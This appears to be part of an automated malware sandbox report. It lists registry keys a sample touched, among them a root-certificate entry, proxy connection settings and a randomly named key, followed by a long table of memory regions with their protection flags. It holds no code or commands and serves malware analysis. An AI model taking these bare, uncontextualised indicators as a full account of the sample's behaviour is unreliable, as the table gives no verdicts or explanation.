HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\31EC7
|
31EC7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\futurable\Macuca
|
Rigsdagsmandens
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
There are 44 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
492A000
|
direct allocation
|
page execute and read and write
|
|
|
|
476000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4745000
|
heap
|
page read and write
|
||
|
471C000
|
heap
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
1B354000
|
heap
|
page read and write
|
||
|
1AFAE000
|
stack
|
page read and write
|
||
|
4502000
|
heap
|
page read and write
|
||
|
3A15000
|
trusted library allocation
|
page read and write
|
||
|
439E000
|
heap
|
page read and write
|
||
|
1D00000
|
heap
|
page read and write
|
||
|
33BB000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
4505000
|
heap
|
page read and write
|
||
|
439C000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B0D0000
|
trusted library allocation
|
page read and write
|
||
|
5F3000
|
heap
|
page read and write
|
||
|
4717000
|
heap
|
page read and write
|
||
|
1C2A9000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
1C210000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
5159000
|
heap
|
page read and write
|
||
|
2E6E000
|
stack
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
461E000
|
stack
|
page read and write
|
||
|
1AAF6000
|
heap
|
page read and write
|
||
|
2360000
|
remote allocation
|
page read and write
|
||
|
2194000
|
heap
|
page read and write
|
||
|
2EF000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
4589000
|
heap
|
page read and write
|
||
|
2D37000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE8B380000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
7FE897DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
124000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
3530000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
729F1000
|
unkown
|
page execute read
|
||
|
1FA0000
|
direct allocation
|
page read and write
|
||
|
4520000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
291000
|
heap
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
95C000
|
heap
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
19B000
|
direct allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
2C2A000
|
stack
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
33EC000
|
stack
|
page read and write
|
||
|
4DEF000
|
heap
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
1C850000
|
heap
|
page read and write
|
||
|
450E000
|
heap
|
page read and write
|
||
|
1A3000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
9E000
|
heap
|
page read and write
|
||
|
4C04000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
44F6000
|
heap
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
1C76A000
|
stack
|
page read and write
|
||
|
2525000
|
trusted library allocation
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
7FE8B340000
|
trusted library allocation
|
page read and write
|
||
|
1C20A000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
5A0000
|
direct allocation
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
1F60000
|
direct allocation
|
page read and write
|
||
|
F4000
|
heap
|
page read and write
|
||
|
1AE1D000
|
heap
|
page read and write
|
||
|
7FE89984000
|
trusted library allocation
|
page read and write
|
||
|
1E00000
|
heap
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
1E80000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
587000
|
direct allocation
|
page read and write
|
||
|
4721000
|
heap
|
page read and write
|
||
|
232000
|
stack
|
page read and write
|
||
|
30B000
|
heap
|
page read and write
|
||
|
2CD0000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
remote allocation
|
page read and write
|
||
|
1A5CA000
|
stack
|
page read and write
|
||
|
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C6CF000
|
stack
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
459A000
|
heap
|
page read and write
|
||
|
580000
|
direct allocation
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
77C000
|
unkown
|
page read and write
|
||
|
1B50E000
|
stack
|
page read and write
|
||
|
2D30000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2B9000
|
heap
|
page read and write
|
||
|
F2000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
4508000
|
heap
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2658000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3AE000
|
stack
|
page read and write
|
||
|
4679000
|
heap
|
page read and write
|
||
|
41CA000
|
stack
|
page read and write
|
||
|
1A92A000
|
stack
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
2EEF000
|
trusted library allocation
|
page read and write
|
||
|
246F000
|
stack
|
page read and write
|
||
|
514A000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
2620000
|
heap
|
page read and write
|
||
|
1C8DF000
|
stack
|
page read and write
|
||
|
1C66000
|
heap
|
page read and write
|
||
|
2AD000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
786000
|
unkown
|
page read and write
|
||
|
2BF4000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4C7A000
|
heap
|
page read and write
|
||
|
44F8000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
3DD000
|
heap
|
page read and write
|
||
|
7FE898A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2532000
|
trusted library allocation
|
page read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
3628000
|
trusted library allocation
|
page read and write
|
||
|
4D1E000
|
heap
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
1C40A000
|
heap
|
page read and write
|
||
|
21C0000
|
trusted library allocation
|
page execute read
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1C5CE000
|
stack
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
239C000
|
stack
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7A5000
|
unkown
|
page read and write
|
||
|
7FE89AE4000
|
trusted library allocation
|
page read and write
|
||
|
45A000
|
heap
|
page read and write
|
||
|
140000
|
direct allocation
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
1C2C7000
|
heap
|
page read and write
|
||
|
4395000
|
heap
|
page read and write
|
||
|
34F7000
|
trusted library allocation
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
4560000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
1C290000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
7AB000
|
unkown
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
4620000
|
heap
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
1AC49000
|
stack
|
page read and write
|
||
|
33DA000
|
heap
|
page read and write
|
||
|
1C30000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
34F1000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
470C000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
333E000
|
heap
|
page read and write
|
||
|
782000
|
unkown
|
page read and write
|
||
|
4DAD000
|
heap
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
1A7B0000
|
heap
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
34C4000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
1FA7000
|
direct allocation
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
468E000
|
heap
|
page read and write
|
||
|
532A000
|
direct allocation
|
page execute and read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
3080000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
4DAD000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
C8000
|
heap
|
page read and write
|
||
|
1B43C000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7FE8B260000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
1C3E2000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
4C36000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B202000
|
trusted library allocation
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
7AB000
|
unkown
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
37CF000
|
stack
|
page read and write
|
||
|
140000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3384000
|
heap
|
page read and write
|
||
|
1B2D4000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
4589000
|
heap
|
page read and write
|
||
|
3AD0000
|
trusted library allocation
|
page read and write
|
||
|
4D1E000
|
heap
|
page read and write
|
||
|
7FE89962000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B1DC000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
275000
|
stack
|
page read and write
|
||
|
CA000
|
heap
|
page read and write
|
||
|
2768000
|
heap
|
page read and write
|
||
|
65D000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
34F9000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
514C000
|
heap
|
page read and write
|
||
|
7FE8B315000
|
trusted library allocation
|
page read and write
|
||
|
4DAC000
|
heap
|
page read and write
|
||
|
1F34000
|
heap
|
page read and write
|
||
|
39C0000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4D1B000
|
heap
|
page read and write
|
||
|
1B1EF000
|
stack
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
4C02000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
7FE89964000
|
trusted library allocation
|
page read and write
|
||
|
7FE899E0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89790000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
33A0000
|
direct allocation
|
page execute and read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
2E8A000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
4502000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
34FA000
|
trusted library allocation
|
page read and write
|
||
|
19F000
|
direct allocation
|
page read and write
|
||
|
1BD0000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
1B1A0000
|
heap
|
page read and write
|
||
|
F0000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
514A000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
2010000
|
heap
|
page execute and read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
2DE3000
|
trusted library allocation
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
8DD000
|
heap
|
page read and write
|
||
|
5E0000
|
direct allocation
|
page read and write
|
||
|
4C3B000
|
heap
|
page read and write
|
||
|
4C04000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4DF6000
|
heap
|
page read and write
|
||
|
4491000
|
heap
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
4DAD000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
40E000
|
heap
|
page read and write
|
||
|
218F000
|
stack
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
17F000
|
heap
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
4C3F000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
472000
|
heap
|
page read and write
|
||
|
1B15E000
|
stack
|
page read and write
|
||
|
4510000
|
heap
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
4C16000
|
heap
|
page read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
2000000
|
heap
|
page execute and read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
4DD1000
|
heap
|
page read and write
|
||
|
280000
|
trusted library allocation
|
page read and write
|
||
|
24C5000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89920000
|
trusted library allocation
|
page read and write
|
||
|
1DD6000
|
heap
|
page read and write
|
||
|
448A000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
4D97000
|
heap
|
page read and write
|
||
|
128000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
459A000
|
heap
|
page read and write
|
||
|
1B4FC000
|
stack
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
1C421000
|
heap
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
458C000
|
heap
|
page read and write
|
||
|
7D7000
|
unkown
|
page readonly
|
||
|
41C000
|
heap
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
31D000
|
heap
|
page read and write
|
||
|
3C8000
|
stack
|
page read and write
|
||
|
44E000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
7FE899A0000
|
trusted library allocation
|
page read and write
|
||
|
59B000
|
direct allocation
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
1B790000
|
heap
|
page read and write
|
||
|
8EB000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
729F4000
|
unkown
|
page readonly
|
||
|
4DAD000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
4715000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
1C1F8000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
7FE8B1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
346B000
|
stack
|
page read and write
|
||
|
7D7000
|
unkown
|
page readonly
|
||
|
1C215000
|
heap
|
page read and write
|
||
|
334D000
|
heap
|
page read and write
|
||
|
7FE8B07C000
|
trusted library allocation
|
page execute and read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
34FB000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4DD3000
|
heap
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
2CBB000
|
heap
|
page read and write
|
||
|
1C06000
|
heap
|
page read and write
|
||
|
3DE1000
|
trusted library allocation
|
page read and write
|
||
|
3384000
|
heap
|
page read and write
|
||
|
154000
|
heap
|
page read and write
|
||
|
279000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
2AD000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
7FE8B228000
|
trusted library allocation
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
4594000
|
heap
|
page read and write
|
||
|
36CC000
|
stack
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
7FE89A30000
|
trusted library allocation
|
page read and write
|
||
|
4C12000
|
heap
|
page read and write
|
||
|
657000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
462D000
|
heap
|
page read and write
|
||
|
450A000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
7FE8B2D0000
|
trusted library allocation
|
page read and write
|
||
|
475B000
|
heap
|
page read and write
|
||
|
145000
|
heap
|
page read and write
|
||
|
1A0000
|
direct allocation
|
page read and write
|
||
|
1C3D2000
|
heap
|
page read and write
|
||
|
4715000
|
heap
|
page read and write
|
||
|
601000
|
heap
|
page read and write
|
||
|
1FB7000
|
direct allocation
|
page read and write
|
||
|
1C3FB000
|
heap
|
page read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
540000
|
direct allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
40AB000
|
stack
|
page read and write
|
||
|
3700000
|
trusted library allocation
|
page execute
|
||
|
4D4B000
|
heap
|
page read and write
|
||
|
7FE8B140000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E9000
|
heap
|
page read and write
|
||
|
26B0000
|
trusted library allocation
|
page execute
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
44F8000
|
heap
|
page read and write
|
||
|
2665000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
509000
|
heap
|
page read and write
|
||
|
462C000
|
heap
|
page read and write
|
||
|
450B000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
1C1D0000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
4321000
|
heap
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
468E000
|
heap
|
page read and write
|
||
|
1A2C0000
|
heap
|
page read and write
|
||
|
462000
|
heap
|
page read and write
|
||
|
1B350000
|
heap
|
page read and write
|
||
|
40B000
|
heap
|
page read and write
|
||
|
7FE8B350000
|
trusted library allocation
|
page read and write
|
||
|
356000
|
heap
|
page read and write
|
||
|
262B000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B106000
|
trusted library allocation
|
page execute and read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
1AD92000
|
heap
|
page read and write
|
||
|
7FE8B0E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A470000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
786000
|
unkown
|
page read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
4C33000
|
heap
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
382000
|
heap
|
page read and write
|
||
|
50E1000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
1B220000
|
heap
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
451F000
|
heap
|
page read and write
|
||
|
43AB000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
4746000
|
heap
|
page read and write
|
||
|
3349000
|
heap
|
page read and write
|
||
|
2F75000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B2B0000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
129000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
4679000
|
heap
|
page read and write
|
||
|
124A1000
|
trusted library allocation
|
page read and write
|
||
|
7FE8983C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FD000
|
heap
|
page read and write
|
||
|
7FE89933000
|
trusted library allocation
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
77C000
|
unkown
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1C25C000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1B19F000
|
stack
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
4DB0000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
439E000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
3384000
|
heap
|
page read and write
|
||
|
4712000
|
heap
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
4329000
|
heap
|
page read and write
|
||
|
2C6000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4504000
|
heap
|
page read and write
|
||
|
439E000
|
heap
|
page read and write
|
||
|
274000
|
heap
|
page read and write
|
||
|
53E9000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
369000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
1ADAD000
|
heap
|
page read and write
|
||
|
4C34000
|
heap
|
page read and write
|
||
|
782000
|
unkown
|
page read and write
|
||
|
7FE89970000
|
trusted library allocation
|
page execute and read and write
|
||
|
509000
|
heap
|
page read and write
|
||
|
122CF000
|
trusted library allocation
|
page read and write
|
||
|
22BF000
|
stack
|
page read and write
|
||
|
473000
|
heap
|
page read and write
|
||
|
94D000
|
heap
|
page read and write
|
||
|
19D000
|
direct allocation
|
page read and write
|
||
|
432F000
|
stack
|
page read and write
|
||
|
5EA000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
5154000
|
heap
|
page read and write
|
||
|
40C0000
|
heap
|
page read and write
|
||
|
1A7B4000
|
heap
|
page read and write
|
||
|
4650000
|
heap
|
page read and write
|
||
|
307F000
|
trusted library allocation
|
page read and write
|
||
|
4749000
|
heap
|
page read and write
|
||
|
339C000
|
stack
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
5154000
|
heap
|
page read and write
|
||
|
129000
|
heap
|
page read and write
|
||
|
5149000
|
heap
|
page read and write
|
||
|
44FB000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
450B000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
4D1B000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
451E000
|
heap
|
page read and write
|
||
|
34F5000
|
trusted library allocation
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
3379000
|
heap
|
page read and write
|
||
|
34F3000
|
trusted library allocation
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
252B000
|
trusted library allocation
|
page read and write
|
||
|
1B39E000
|
stack
|
page read and write
|
||
|
33C5000
|
heap
|
page read and write
|
||
|
12C000
|
stack
|
page read and write
|
||
|
7FE89AF6000
|
trusted library allocation
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1C98F000
|
stack
|
page read and write
|
||
|
2764000
|
heap
|
page read and write
|
||
|
1B510000
|
heap
|
page read and write
|
||
|
1C24B000
|
heap
|
page read and write
|
||
|
7FE8B022000
|
trusted library allocation
|
page read and write
|
||
|
4DEB000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
789000
|
unkown
|
page read and write
|
||
|
1AEFE000
|
stack
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
5156000
|
heap
|
page read and write
|
||
|
7FE8B329000
|
trusted library allocation
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
1A68E000
|
heap
|
page execute and read and write
|
||
|
1AE6F000
|
heap
|
page read and write
|
||
|
7FE8B360000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
180000
|
trusted library allocation
|
page read and write
|
||
|
